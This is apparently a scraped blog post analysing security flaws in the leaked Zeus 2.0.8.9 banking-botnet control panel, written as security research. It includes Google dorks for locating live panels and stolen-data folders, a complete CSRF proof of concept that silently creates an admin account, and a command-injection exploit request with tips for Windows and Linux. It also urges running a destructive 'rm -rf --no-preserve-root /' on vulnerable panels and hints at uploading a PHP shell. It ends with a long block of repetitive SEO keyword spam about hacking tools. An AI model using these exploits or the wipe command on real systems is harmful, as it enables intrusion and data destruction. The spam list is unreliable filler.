Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:

• inurl:cp.php?m=login - this should be the login to the control panel
• inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
• inurl:install/index.php - this should be deleted, but I think this is useless now.

Boring vulns found

• Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
• No password policy - admins can set up really weak passwords
• No anti brute-force - you can try to guess the admin's password. Default username is admin
• Password autocomplete enabled - boring
• Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
• No CSRF protection - except on the password change, where the old password is needed :-( boring

Update: You can use the CSRF to create a new user with admin privileges:

<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 

• MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
• ClickJacking - really boring stuff
• Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
• SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)

The following stuff looks good, at least some vulns were taken seriously:

• The system directory is protected with .htaccess deny from all.
• gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
• Anti XSS: the following code is used almost everywhere

return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');

My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)

And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:

POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 

because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

More info

1. Hacker Tools For Mac
2. Pentest Box Tools Download
3. Beginner Hacker Tools
4. Hacker Tools Free Download
5. Hacker Tools Software
6. Hacking Tools For Games
7. Hacker Tools List
8. Hacking Tools Download
9. Hacking Tools For Windows Free Download
10. Hak5 Tools
11. Hacker Tools For Pc
12. Nsa Hack Tools
13. Hacking Tools For Pc
14. Hack Tools For Mac
15. Hack Tools For Pc
16. Hacker Tools Software
17. Pentest Automation Tools
18. Pentest Tools For Android
19. Pentest Tools For Windows
20. Wifi Hacker Tools For Windows
21. Hack Tools Pc
22. Growth Hacker Tools
23. Hacking Tools Software
24. Hacker Tools 2019
25. Pentest Box Tools Download
26. Hacker Tools Mac
27. Pentest Tools Apk
28. Tools 4 Hack
29. Pentest Tools Kali Linux
30. How To Hack
31. Hacking Tools Download
32. Hacker Tools Free
33. Hack Tools For Windows
34. New Hacker Tools
35. New Hacker Tools
36. Pentest Tools For Mac
37. Hacker Tools List
38. Hacker Tools Apk Download
39. Hacker Tools Windows
40. Pentest Tools
41. Pentest Tools Windows
42. Hack Tools For Windows
43. Underground Hacker Sites
44. Best Hacking Tools 2020
45. How To Install Pentest Tools In Ubuntu
46. Hacking Tools Windows 10
47. Hacker Tools For Windows
48. Ethical Hacker Tools
49. Hacker Tools Github
50. Game Hacking
51. Pentest Tools For Windows
52. Free Pentest Tools For Windows
53. Pentest Tools Review
54. Hack Tools Github
55. Hack Apps
56. Blackhat Hacker Tools
57. Wifi Hacker Tools For Windows
58. Hacker
59. Hack Tools For Games
60. Pentest Tools Nmap
61. Bluetooth Hacking Tools Kali
62. Hack Website Online Tool
63. Hacker Security Tools
64. Hacker Tools List
65. World No 1 Hacker Software
66. Hacker Tools Windows
67. Best Hacking Tools 2019
68. Physical Pentest Tools
69. Hack Tools Pc
70. Hack Apps
71. Hack Tools Download
72. Black Hat Hacker Tools
73. Blackhat Hacker Tools
74. Hacking Tools For Windows
75. Hack Tools For Games
76. Hacking Tools Free Download
77. Pentest Tools Windows
78. Hacking Tools
79. Hacking Tools Download
80. Hacking Tools For Mac
81. Pentest Tools
82. Nsa Hack Tools
83. Hacker Tools Linux
84. Pentest Tools Windows
85. Hacker Tools Github
86. Computer Hacker
87. Physical Pentest Tools
88. Hak5 Tools
89. Termux Hacking Tools 2019
90. Hacking Tools Online
91. Hacking Tools Usb
92. Pentest Tools Framework
93. Underground Hacker Sites
94. Hacker Tools For Windows
95. Pentest Tools Find Subdomains
96. Pentest Tools Framework
97. Pentest Tools Bluekeep
98. Pentest Tools Nmap
99. Pentest Tools For Mac
100. Hacking Tools For Windows Free Download
101. How To Make Hacking Tools
102. Pentest Recon Tools
103. What Are Hacking Tools
104. Hack And Tools
105. Hacker Tools 2020
106. Hack Tool Apk No Root
107. Hack Apps
108. Hack And Tools
109. Best Hacking Tools 2019
110. Black Hat Hacker Tools
111. Hacking Tools Windows 10
112. Pentest Tools Android
113. Pentest Tools Review
114. Pentest Tools Nmap
115. Pentest Automation Tools
116. Hacker Tools Free Download
117. Hacker Tools 2020
118. Hacks And Tools
119. Hacker Tools 2019
120. Hacker Tools
121. Hacks And Tools
122. Hacker Tools Windows
123. Pentest Automation Tools
124. Pentest Tools Find Subdomains
125. Hacking Tools For Kali Linux
126. New Hacker Tools
127. Hacking Tools Hardware
128. Pentest Tools For Android
129. Pentest Box Tools Download
130. Hack Tool Apk
131. Pentest Tools Review
132. Hacker Tools Apk Download
133. Hack Tools Github
134. Ethical Hacker Tools
135. Hacker Hardware Tools
136. Top Pentest Tools
137. Nsa Hacker Tools
138. Hack Tools
139. Pentest Automation Tools
140. Hacking Apps
141. Hacking Tools For Windows 7
142. Hack Tool Apk
143. Hacks And Tools